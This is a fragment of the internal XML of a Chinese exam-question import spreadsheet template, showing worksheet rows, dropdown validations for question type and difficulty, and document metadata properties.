      <c r="H22" s="1"/>
      <c r="I22" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J22" s="1" t="s">
        <v>85</v>
      </c>
      <c r="K22" s="1" t="s">
        <v>87</v>
      </c>
      <c r="L22" s="1"/>
    </row>
    <row r="23" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A23" s="1" t="s">
        <v>91</v>
      </c>
      <c r="B23" s="1">
        <v>123</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>92</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>93</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1"/>
      <c r="G23" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H23" s="1"/>
      <c r="I23" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J23" s="1" t="s">
        <v>85</v>
      </c>
      <c r="K23" s="1" t="s">
        <v>72</v>
      </c>
      <c r="L23" s="1"/>
    </row>
    <row r="24" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A24" s="1" t="s">
        <v>91</v>
      </c>
      <c r="B24" s="1">
        <v>321</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>92</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1"/>
      <c r="G24" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H24" s="1"/>
      <c r="I24" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J24" s="1" t="s">
        <v>85</v>
      </c>
      <c r="K24" s="1" t="s">
        <v>72</v>
      </c>
      <c r="L24" s="1"/>
    </row>
    <row r="25" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A25" s="1"/>
      <c r="B25" s="1"/>
      <c r="C25" s="1"/>
      <c r="D25" s="1"/>
      <c r="E25" s="1"/>
      <c r="F25" s="1"/>
      <c r="G25" s="1"/>
      <c r="H25" s="1"/>
      <c r="I25" s="1"/>
      <c r="J25" s="1"/>
      <c r="K25" s="1"/>
      <c r="L25" s="1"/>
    </row>
    <row r="26" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A26" s="1"/>
      <c r="B26" s="1"/>
      <c r="C26" s="1"/>
      <c r="D26" s="1"/>
      <c r="E26" s="1"/>
      <c r="F26" s="1"/>
      <c r="G26" s="1"/>
      <c r="H26" s="1"/>
      <c r="I26" s="1"/>
      <c r="J26" s="1"/>
      <c r="K26" s="1"/>
      <c r="L26" s="1"/>
    </row>
    <row r="27" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A27" s="1"/>
      <c r="B27" s="1"/>
      <c r="C27" s="1"/>
      <c r="D27" s="1"/>
      <c r="E27" s="1"/>
      <c r="F27" s="1"/>
      <c r="G27" s="1"/>
      <c r="H27" s="1"/>
      <c r="I27" s="1"/>
      <c r="J27" s="1"/>
      <c r="K27" s="1"/>
      <c r="L27" s="1"/>
    </row>
    <row r="28" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A28" s="1"/>
      <c r="B28" s="1"/>
      <c r="C28" s="1"/>
      <c r="D28" s="1"/>
      <c r="E28" s="1"/>
      <c r="F28" s="1"/>
      <c r="G28" s="1"/>
      <c r="H28" s="1"/>
      <c r="I28" s="1"/>
      <c r="J28" s="1"/>
      <c r="K28" s="1"/>
      <c r="L28" s="1"/>
    </row>
    <row r="29" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A29" s="1"/>
      <c r="B29" s="1"/>
      <c r="C29" s="1"/>
      <c r="D29" s="1"/>
      <c r="E29" s="1"/>
      <c r="F29" s="1"/>
      <c r="G29" s="1"/>
      <c r="H29" s="1"/>
      <c r="I29" s="1"/>
      <c r="J29" s="1"/>
      <c r="K29" s="1"/>
      <c r="L29" s="1"/>
    </row>
    <row r="30" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A30" s="1"/>
      <c r="B30" s="1"/>
      <c r="C30" s="1"/>
      <c r="D30" s="1"/>
      <c r="E30" s="1"/>
      <c r="F30" s="1"/>
      <c r="G30" s="1"/>
      <c r="H30" s="1"/>
      <c r="I30" s="1"/>
      <c r="J30" s="1"/>
      <c r="K30" s="1"/>
      <c r="L30" s="1"/>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K416">
    <sortCondition ref="A1:A416"/>
  </sortState>
  <phoneticPr fontId="1" type="noConversion"/>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="A1:A3 A20:A1048576" xr:uid="{55626164-6E00-428B-943F-7526A006D15F}">
      <formula1>"单选,多选,判断,填空,简答,论述"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="A4:A19" xr:uid="{B50475FE-FFC2-49F8-ADBD-8CFC27ED0DFB}">
      <formula1>"单选,多选"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="G1:G1048576" xr:uid="{87EE920F-03A1-41C8-838E-066A184866F9}">
      <formula1>"简单,中等,困难"</formula1>
    </dataValidation>
  </dataValidation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试题导入模板</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shenyanjian</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-27T01:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-13T00:09:27Z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2015_ms_pID_725343">
    <vt:lpwstr>(3)CbAjrTMWqE1lArS+m/ONV4a8zykd1u2Gk3ZlGtvnISUK/BKntnCp5DxyCa9tXLg78Dg5a+Ur_x000d_
jktFKEUiuBd3DICMd9UXpxlXJdemPX0UvQje0KyEIenx8r5hs/T5iiEnsXXMohcksNR9qV0h_x000d_
kGGQf3Tvq9hSCrzmjYPmx8s27NXf6KxE89Z8hpSyEjQ4KJjaGpVKszgIZ9sSsnZNXwuI2NNK_x000d_
vzXNbI/kY/r4dwlQtT</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_2015_ms_pID_7253431">
    <vt:lpwstr>yFn4bOnrXDjA6ZxZcYnqEAYYfnSdQeUDYgj3Zjwc/7gy2PVCuUqqjV_x000d_
w2ORveDys/WGqIr/adiywyIddmYFGBkJTC6g9eDDc2TECbqzyCw8HTPWNTa56PqTSxfwOtyZ_x000d_
gdpYiw5zhdu2naFcRIFAN/uVLPgdqOAT0Sa3D+lYIq5IAdqA5rTk1RNKxomIRRH299JCWdCD_x000d_
wrjQv/Rwr6nOHWNnKf8wL1uLjpdl6Fps76xi</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_2015_ms_pID_7253432">
    <vt:lpwstr>sg==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.10228</vt:lpwstr>
  </property>
</Properties>
</file>